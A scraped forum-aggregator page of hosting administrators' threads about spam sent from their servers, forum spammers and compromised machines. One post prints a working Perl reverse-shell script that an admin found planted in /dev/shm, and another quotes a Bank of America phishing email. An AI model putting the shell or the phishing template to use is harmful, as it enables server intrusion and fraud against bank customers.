Found The Spammer

Dec 31, 2007

How can I found the spammer on our server?

one of our customer trying to send mail with a PHP file! but I cannot found this account, can you help me to found this user?

View 6 Replies


ADVERTISEMENT

My Server Seems To Be A Spammer

Apr 29, 2009

I have recently been receiving reports from AOL's feedback loop that my server is sending out spam. I have checked the whole server, but cannot find anything strange.

There are some strange things with these feedback reports. I'll post a few lines below (i crossed out my domain with xxx):

Quote:

Received: from andersenreesel by holderem.xxx.biz with local (Exim 4.23)

Received: (qmail 64859 invoked by uid 24901)

Received: from janislanhami by xxx.biz with local (Exim 4.26)

Received: (qmail 43829 invoked by uid 147); 08 Apr 2009 21:22:39 -0000

Received: from raphaelpinkertone by standei.xxx.biz with local (Exim 4.23)

Received: from imanoldelphine by dispatched.xxx.biz with local (Exim 4.23)

Received: from conrado by hostic.xxx.biz with local (Exim 4.23)

The first issue i have is with the subdomains, like "dispatched", "standei", "hostic", etc. These subdomains do not exist on my system. Also, my server does not run the exim MTA.

Another issue i have is the "invoked by uid" statements with uid's 147 and 24901. These UID's do not exist on my system. The passwd file uid's go to around 110.

Apart from these strange things, the IP that is listed in the upper part of the headers:

Quote:

Received: from xxx.biz (xxx.biz [85.xxx.xxx.xxx])

The domain and IP address is correct there, which should indicate that the spam was sent from my system. Or wasn't it?

View 11 Replies View Related

IIS SMTP Spammer

May 10, 2009

to stop the IIS SMTP Spammers how you find the culprit spammers site I tried the smtp monitor but not avail.

View 10 Replies View Related

Chinese Spammer ...

Jun 24, 2008

I host a vBulletin forum on a US server. I've been getting a lot of signups from one particular spammer, wanting to post about gold harvesting for WoW. I've blocked his IP's, however he keeps using proxies.

He constantly signs up under the name "Array"... Is there a way I can block him for good? I can't moderate user sign-ups, as I'm mostly away from my computer and can't moderate them all the time.

View 1 Replies View Related

How To Catch This Spammer

May 16, 2007

None of domain in this email is hosted with us but there are thousand of emails day some body blast in our queue. We are failed to detect. We have enabled phpnobody spam logging but failed to get track of this user.

how to catch this spammer. There are no clues of to catch him.

[root@sm4 ~]# /root/qmHandle -m3261696

--------------
MESSAGE NUMBER 3261696
--------------
Received: (qmail 7056 invoked from network); 16 May 2007 05:34:18 -0500
Received: from axicom.net (HELO User) (67.112.176.250)
by 14.32.5446.static.theplanet.com with SMTP; 16 May 2007 05:34:18 -0500
Reply-To: <notice@boamilitary.com>
From: "Bank of America Military Bank"<notice@boamilitary.com>
Subject: Notification from Bank of America Military Bank
Date: Wed, 16 May 2007 04:44:51 -0700
MIME-Version: 1.0
Content-Type: text/html;
charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

<title>Military Bank Online and Bill Payer Deactivation</title>
<FONT face=Arial size=2> </FONT>
<DIV>
<p><font face="Arial" size="2" color="#FFFFFF"> ...<img border="0" src="http://power-web43.net/images/boa.bmp"></font></p>
<p><font face="Arial" size="2">&nbsp;&nbsp; Dear
Member,</font></p>
<DIV><font face="Arial" size="2">&nbsp;&nbsp; This is your official notification
from Bank of America Military Bank that the service(s) listed below<BR>
&nbsp;&nbsp; will be deactivated and deleted if not renewed immediately. Previous
notifications have<BR>
&nbsp;&nbsp; been sent to the Billing Contact assigned to this account. As
the Primary Contact, you<BR>
&nbsp;&nbsp; must renew the service(s) listed below or it will be deactivated
and deleted. <BR>
<BR>
<BR>
&nbsp;&nbsp; <b> <a target="_blank" href="http://moremail.epicalliance.com/america.php"><FONT color=#003399>Renew
Now</FONT></a>&nbsp;</b>your <b>Military Bank Online </b>and<b> Bill Payer </b>
services.</font></DIV>
<DIV><font face="Arial" size="2">&nbsp;</font></DIV>
<DIV><font face="Arial" size="2"><BR>
&nbsp;&nbsp; SERVICE: <b>Military Bank Online </b>and<b> Bill Payer</b>.<BR>
&nbsp;&nbsp; EXPIRATION: <b>May,&nbsp;18 2007</b></font></DIV>
<DIV><font face="Arial" size="2">&nbsp;</font></DIV>
<DIV><font face="Arial" size="2"><BR>
&nbsp;&nbsp; Thank you for using Military Bank Online.
<br> &nbsp;&nbsp; We appreciate your business and the opportunity to serve you.</font></DIV>
<DIV><font face="Arial" size="2">&nbsp;</font></DIV>
<DIV><font face="Arial" size="2">&nbsp;&nbsp;&nbsp;Bank of America Military Bank
Member Service</font></DIV>
<DIV><font face="Arial" size="2">&nbsp;</font></DIV>
<DIV><font face="Arial" size="2"><BR>
&nbsp;&nbsp; *****************************************************************************<BR>
&nbsp;&nbsp; IMPORTANT MEMBER SERVICE INFORMATION<BR>
&nbsp;&nbsp; *****************************************************************************</font></DIV>
<DIV><font face="Arial" size="2">&nbsp;</font></DIV>
<DIV><font face="Arial" size="2">&nbsp;&nbsp; Please do not reply to this message.
For any inquiries, contact Member Service.</font></DIV>
<DIV><font face="Arial" size="2">&nbsp;</font></DIV>
<DIV><font face="Arial" size="2">&nbsp;&nbsp; <BR>
&nbsp;&nbsp; Copyright © 2007 &nbsp;Bank of America Corporation. All rights reserved.</font></DIV>
</DIV>

None of domain in this email is hosted with us but there are thousand of emails day some body blast in our queue. We are failed to detect. We have enabled phpnobody spam logging but failed to get track of this user.

how to catch this spammer. There are no clues of to catch him.

View 10 Replies View Related

Hostmonster And Bluehost Spammer

Dec 26, 2008

Hostmonster and Bluehost Spammer

What is the relationship between Hostmonster and Bluehost?

One spammer has a domain with an NS1.HOSTMONSTER.COM but their IP belongs to Bluehost.

View 7 Replies View Related

How To Monitor Spammer Sactivity

May 26, 2007

I just setup my own LAMP server.

It is only used for my own domains so I want to be able to watch all mail that gets sent from my server, via php or otherwise.

Basically I just want to be able to personally monitor what mail is getting sent from my server so that I can watch for possible spammer activity.

I am using postfix and webmin.. I have sendmail installed to, but I don't think it is getting used..

I guess theres got to be a log somwhere... but I am not sure where it is?

I have postfix set to CC me of all mail that gets sent but, it doesnt seem to work all the time.. just for certain things..

View 3 Replies View Related

Keep Getting An Email Spammer On My Server

May 26, 2008

Now first I will say I have NO idea how such spamming works, how a punk can get on my server and sent emails out.

I have had a team to look at it they also did something, but now it happens again for the 5th time, what can i do, are there any software or tools one can use like a antivirus to check the server and how can I avoid such sh..

View 14 Replies View Related

How I Can Stop Spammer From My Server

Jul 14, 2008

How i can stop Spammer from my server?

my control panel is CPANEL !

what software i must install?

View 4 Replies View Related

Spammer On CPanel Server

Mar 31, 2008

i have the following inside: /usr/local/apache/domlogs

worldlanguage.com-smtpbytes_log
deafper4mer.org-smtpbytes_log missingchildrenblog.com-smtpbytes_log worldlpgas.com-smtpbytes_log
deathball.net-smtpbytes_log missingkids.com-smtpbytes_log worldnet.att.net-smtpbytes_log
deberrym.freeserve.co.uk-smtpbytes_log mistressj.com-smtpbytes_log worldswithoutend.com-smtpbytes_log
djchass.com-smtpbytes_log ms9.hinet.net-smtpbytes_log zollnergarmisch.de-smtpbytes_log
djessentials.com-smtpbytes_log msa.hinet.net-smtpbytes_log zomtide.com-smtpbytes_log
djgavin.com-smtpbytes_log msn.com-smtpbytes_log zoominfo.com-smtpbytes_log
djlw.com-smtpbytes_log mtaconsulting.com-smtpbytes_log ztree.com-smtpbytes_log
djphear.com-smtpbytes_log mtco.com-smtpbytes_log zuneluv.com-smtpbytes_log
dkburnap.com-smtpbytes_log mtdemocrat.com-smtpbytes_log zwergenland-sterkrade.de-smtpbytes_log
dmans.com-smtpbytes_log mtu-net.ru-smtpbytes_log zyit.com-smtpbytes_log
dmatrans.com-smtpbytes_log mulberrycorner.com-smtpbytes_log zymico.com-smtpbytes_log
dmoz.org-smtpbytes_log multexinvestornetwork.com-smtpbytes_log zytor.com-smtpbytes_log
dncinc.com-smtpbytes_log multimedia.cl-smtpbytes_log zzangbbori.com-smtpbytes_log
dnpeters.com-smtpbytes_log mundosofa.com-smtpbytes_log
doble.com-smtpbytes_log murphyspage.com-smtpbytes_log

all this domains are NOT hosted on my server (there are a lot more of this entries.)

I has ben told that this domain namens are used while spaming.

Is there any way to idetify what acocunt has ben hacked and sends spaming via pop3 or apache.

I note a lot of pop3 connections fron russian, china vietnam and high cpu load this happens.

(nobody sernder has already ben dsable il WHM tweaks)

View 0 Replies View Related

How Did This Forum Spammer (sagepowder) Do This

Jan 7, 2007

I just found posts every a few days from an apparent spammer "sagepowder" in my forum (not so popular and has nothing to do with skiing). The subject is always "new here".

The content is "Any snowboarders or skiiers on this forum? I am planning a trip to BC on a snowboarding trip next week" or "I am new here, just saying hello".

I checked the apache log and it doesn't seem to be a robot script posting this. i.e. it browses to the index page, picked up my hidden field that blocks robots, post new topic, the go back to index page.

What surprised me is that when I google this guy, I got 108,000 results with the same content on tons of forums! All with total post number of 1 or 2 on each forum:
[url]

How did he do this? How to block this?

View 7 Replies View Related

What Is This Email Spammer Trying To Accomplish

Sep 26, 2007

I recently moved web services for one of my hosted domains (let's call it example.com) from one server (let's call it .org) to another server (let's call it .net) example.com has been on .org for about 5 years. .org handled all example.com web services, and all email. I recently updated example.com's DNS record to point www.example.com and example.com to the .net server. I didn't change the MX record or mail.example.com to point to .net. Mail continues to be delivered normally to example.com on the .org server.

Except now spammers are hitting the .net server, e.g.

Sep 26 09:26:03 host postfix/smtpd[15098]: NOQUEUE: reject: RCPT from unknown[12.171.150.130]: 554 5.7.1 <AutumnvagaryMontano@example.com>: Relay access denied; from=<> to=AutumnvagaryMontano@example.com proto=SMTP helo=<mdgen-print.marylandgeneral.org>

Is it normal practice for spammers to send dictionary attack based spam to a domain's server that doesn't even handle email? All the spam coming is clearly just random email addresses not based on anything that exsists at the domain, and most of the addresses are so very random I can't imagine they exsist anywhere.

View 1 Replies View Related

Anyone Else Seeing WordPress Spammer DDOS

Jan 5, 2007

For about a month or so now I have a domain I host under serious attack from what I think are spammers. It's a wordpress site, and they are getting big numbers of POST requests to the WordPress comments file, e.g.

Code:

POST /wp-comments-post.php HTTP/1.1
It's a well distributed attack, and I'm doing well with some scripts I wrote to block the requests to the wp-comments-post.php file. The real comment file has long since been moved, so any POST to the file gets firewalled. It's several thousand IPs from all over the place.

I don't believe it's a malicious attempt to bring the site down, but I'm guessing it's a blog comment spammer that has something set wrong and he's pounding this site to death by accident. I could be wrong on that though.

Anyone have any good defense scripts to share?

View 7 Replies View Related

How We Can STOPED FOREVER To This Spammer

May 14, 2007

in our case, HACKER no DELETE files...

He send Spam by POST to file.php

We have APACHE_suexec + PHP in SAFE_MODE=true;

Server is down 3 times in < of 24 hours by this motive.
In this moment We have more of 20.000 mails to send to Bellsouth and Yahoo...

We know this becouse we run

exim -bpr | exiqsumm -c | head

Count Volume Oldest Newest Domain
----- ------ ------ ------ ------
26797 66MB 7h 5m yahoo.com
3260 615KB 3h 3h bellsouth.net
1253 540KB 9h 2h webtv.net
1134 329KB 3h 2h excite.com
926 261KB 5h 3h optonline.net
226 258KB 3h 3h sbcglobal.net
----------------------------------------------

Wath we can do?

How we can stoped this mails?

How we can STOPED FOREVER to this spammer?

View 2 Replies View Related

Plesk 12.x / Windows :: MailEnable Locate Spammer

Nov 5, 2014

My System is a Windows Server 2012 r2 with Plesk 12.

On this system i have installed MailEnable as my Mailserver.

So at the moment something is spam on this server, but i can't find out who is it.

Received: from win02.XXXXXX([MY IP] helo=WIN02.home)
(envelope-from <root@XXXXXXXX>)
id 1XlyHP-00038b-R0
for x; Wed, 05 Nov 2014 11:57:37 +0100

[Code].....

The header is meaning that the spams come from root@, but there is no account with the name root@...

On linux it is so easy to find the spam with qmail or postfix. Why mailenable it is so difficult

View 3 Replies View Related

Plesk 12.x / Linux :: Disable Php Mail For Spammer Clients?

Dec 9, 2014

Sometimes my clients install untrusted scripts to their account what causes spamming, because these scripts sending high number of spam emails. Is there an automatically way to disable php mail function, or disable the account temporary?

[URL]

View 3 Replies View Related

Hundreds Of "Mail Delivery Failed" Thanks To Spammer

Sep 22, 2007

Someone f'in spammer has used my legitimate email address as the from address for their spam emails. Now I am getting hundreds of

"Mail delivery failed: returning message to sender" in my inbox.

I use cpanel to host the domain/email, is there anything I can do?

View 2 Replies View Related

Dc.pl Found In /dev/shm

Apr 4, 2007

Found a suspicious script running on a server in /dev/shm

Code:
#!/usr/bin/perl
use IO::Socket;
$system = '/bin/sh';
$ARGC=@ARGV;
print "Connect Back (S) 2007

";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port]

";
die "Ex: $0 127.0.0.1 2121
";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host
";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host
";
print "[*] Connecting... $ARGV[0]
";
print "[*] Spawning Shell
";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("unset HISTFILE; unset SAVEHIST ;echo;id;uname -a;w");
system($system);
#EOF
Removed it, changed all passwords, etc, anyone know how this might've gotten into /dev/shm? ( CentOS 4.4 )

View 14 Replies View Related

New Malscripts Found

Jun 11, 2009

We were tasked with helping a website owner find all the malscripts on his site and remove them. He, like many, learned that his site was delivering malicious code with an email from Google.

This website owner had tried removing the code himself and yet his site was still blacklisted by Google. This was killing his sales as anyone visiting with Firefox as their browser, or Chrome, were greeted with a big warning:

This site may harm your computer.

After about a week of trying to rectify the problem himself, he contacted us.

He provided us FTP access to his site so we could tackle it.

After downloading his site (which literally took 3 hours) we started scanning. We grep'd for the word "base64_decode" and found over 228 php files all with the following malscript (spaces added to protect the innocent):

Code:....

View 0 Replies View Related

Ssl --address Not Found

Mar 16, 2009

I have a valid ssl certificate for the website but it still shows address not found error. But sometimes it just works fine.

is it related to dns issue?

View 6 Replies View Related

Server Not Found

May 11, 2008

I do not know where to post this, I recently changed Hosts.

My domain through GoDaddy was changed to my new account that was setup, The issue is everyone else can see my website but me and I am not sure why?

On my end I get Server Not Found?

I can see my site through a Proxy and also I have shown the site to a few people and they have no issues accessing it...

View 14 Replies View Related

Rookit Found. What To Do Next?

Dec 1, 2008

For the first time after running a server for about a year I decided to buy a new server and in it I found out that there is a some sort of infection in it. What should I do next. The logs are attached in a n attachment.

Attached Files

rootkit.log.txt (9.4 KB, 70 views)

View 3 Replies View Related

Server Not Found

May 17, 2008

I cant visit my website! <snipped> everytime I go it says server not found. So I told some friends to go and they are able to see and visit <snipped> How is that possible?? They could and I cant? Yesterday same thing but then couple hours later it worked I could visit hmlegends.com but i didnt do anything and now today same thing server not found! i cleaned my history everything and still server not found!

So what I did is used a proxy <snipped> and then it worked!

But then I dont use a proxy SERVER NOT FOUND! Its like my IP cant reach hmlegends.com

I dont know how to solve this?!?? It just says server not found!

But it looks like everyone else could access it!

Anyways im using Firefox 2 but then maybe i thought it was my browser so switched to 3 so currently on firefox 3
and no its not its something with my IP cuz when i use proxy i could go to my site

but point is i dont wanna use proxy i wanna use my IP to go to hmlegends.com

Also im using Dial Up Internet!

I use AOL Dialer to connect!

Aol Dialer 4.8.8.4

View 9 Replies View Related

Apt-get Command Not Found

Apr 27, 2008

I have recently brought a VPS hosting package. At the moment I am going through the tutoritals on the net that I have researched before getting a VPS package to give me some understanding on what I need to do to securior the server and also how to install the software that I require.

For most of today, I have been trying to sort out a problem that I am currently having.

Of which is I am trying to sort out a part of the tutorial from a website that requires the use of apt commands.

But for every command I am getting the message back apt..... Command not found. I am currently using the ubuntu operating system. And through some research, I have got the feeling that I might have the bare installation done on my server to just make it work.

Would I be right, and with the bare installation apt commands wouldn't be installed?

If I am, how would I go about installing the Apt commands and anything else that I might require?

View 7 Replies View Related

Cronjob Not Found

Feb 22, 2008

I got a new BOX, i see 'cronjob' not working,

cronjob
-bash: cronjob: command not found

I installed

yum install vixie-cron.i386

Still

cronjob
-bash: cronjob: command not found

# cron
-bash: cron: command not found

how can i get 'cronjob' working?

View 4 Replies View Related

Cgi-bin Directory Not Found

Jan 20, 2008

I upgraded from Apache 1.3.7 to the latest copy
Everything works nicely, except the cgi-bin directory

When a user tries to access a script or even a standard text file, it throws up the error..

Not Found

The requested URL /cgi-bin/first.txt was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

When they try and access the cgi-bin directory itself, they get

Forbidden

You don't have permission to access /cgi-bin/ on this server

Now, I've checked the httpd.conf file and this is what it has for Cgi-bin

<IfModule alias_module>
ScriptAlias /cgi-bin/ "/usr/local/apache/cgi-bin/"
</IfModule>

<Directory "/usr/local/apache/cgi-bin">
AllowOverride None
Options None
Order allow,deny
Allow from all

</Directory>

And the error logs say..

[Sun Jan 20 18:09:56 2008] [error] [client xx.xx.xx.xx] File does not exist: /home/goewowc/public_html/404.shtml
[Sun Jan 20 18:09:56 2008] [error] [client xx.xx.xx.xx] script not found or unable to stat: /usr/local/apache/cgi-bin/first.txt

The CGI-bin directory is chmodded correctly, the files are also chmodded and belong to the correct group

View 3 Replies View Related

PHP GD Module Not Found

Nov 16, 2007

while am installing some programs there is some problem in my php

PHP GD Module Not Found

how could i install it in SSH root?

View 10 Replies View Related

Found An IRC Bot On My Server

Mar 21, 2008

After going back and forth with the folks that are supposed to be managing my server they finally checked and found an irc bot. Here is their message:

I have found a irc bot running on your server. The binaries are located at /var/lib/texmf/.dat/. You can see the tar file which the hacker uploaded at /var/lib/texmf/. I have changed the permissions to 000 so that you can verify the files.

The user of the files are nobody. Hence it is clear that the files were uploaded via url injection using some vulnerable script under some domain. Unfortunately there are no helpful logs to find the exact domains and the vulnerable script. It is certain that the files were first uploaded to /tmp and then moved from there. You can see some similar hack files at /tmp/.dat, /tmp/var and /tmp/.dev12. Also the permission of /var/lib/texmf/ was 777.

You should update all your web softwares to latest version so that they will include latest security patches. Also I will recommend you to enable mod_security in your server to prevent further hacks.

Let us know if you want this to be enabled.

View 8 Replies View Related

Botnet Found

Jan 5, 2008

Our Security Technician found yesterday a 200 user botnet on a hidden IRC server and was able to quickly email the compromised systems information (just hostname) to our abuse email. So today i spent the last 2 hours sending emails off to web hosting companies, educational institutions and corporate companies telling them that their systems have been compromised, we regulary email out systems we have found compromised. The thing that stuns me is that most of the systems we found compromised on IRC are dedicated lines between 10MBPS to 1GBPS... I found a few hosting companies and will list them so they can be found by them:

lvps212-241-192-85.vps.webfusion.co.uk
wp056.webpack.hosteurope.de
wp097.webpack.hosteurope.de
wp049.webpack.hosteurope.de
wp055.webpack.hosteurope.de
m2.wrango.com - Dedicated Server with NetworkSolutions
server1.hostfree.com.br

View 6 Replies View Related

Libmysqlclient_14' Not Found

Apr 21, 2007

My server use cPanel 10x
CentOS

how to fix this problem?

php: /usr/lib/libmysqlclient.so.14: version `libmysqlclient_14' not found (required by php)

View 1 Replies View Related

Script Found

Sep 27, 2007

I just found a script on a customers account after some problems they were having, they mentioned injecting php code, that immediately threw up a red flag, when i took a look i found c99.php

I checked up and this seems to be the web equivalent of a rootkit.

Are there any legitimate reasons for this script? The customer is one of the strangest i've came accross because he had the lowest fraud score yet, used a Lady's name at signup/payment, yet calls himself Michael and seemed to do something with WHMcs security wise.. i dont want to post details as checks are still ongoing but it seems to be a problem with Language scripts and the customer was able to sign up on a monthly plan but Biannually... so no more invoices till 2009 ... strange, although wether innocently this was done or is a known security hole in WHMCS is not known yet.

View 14 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved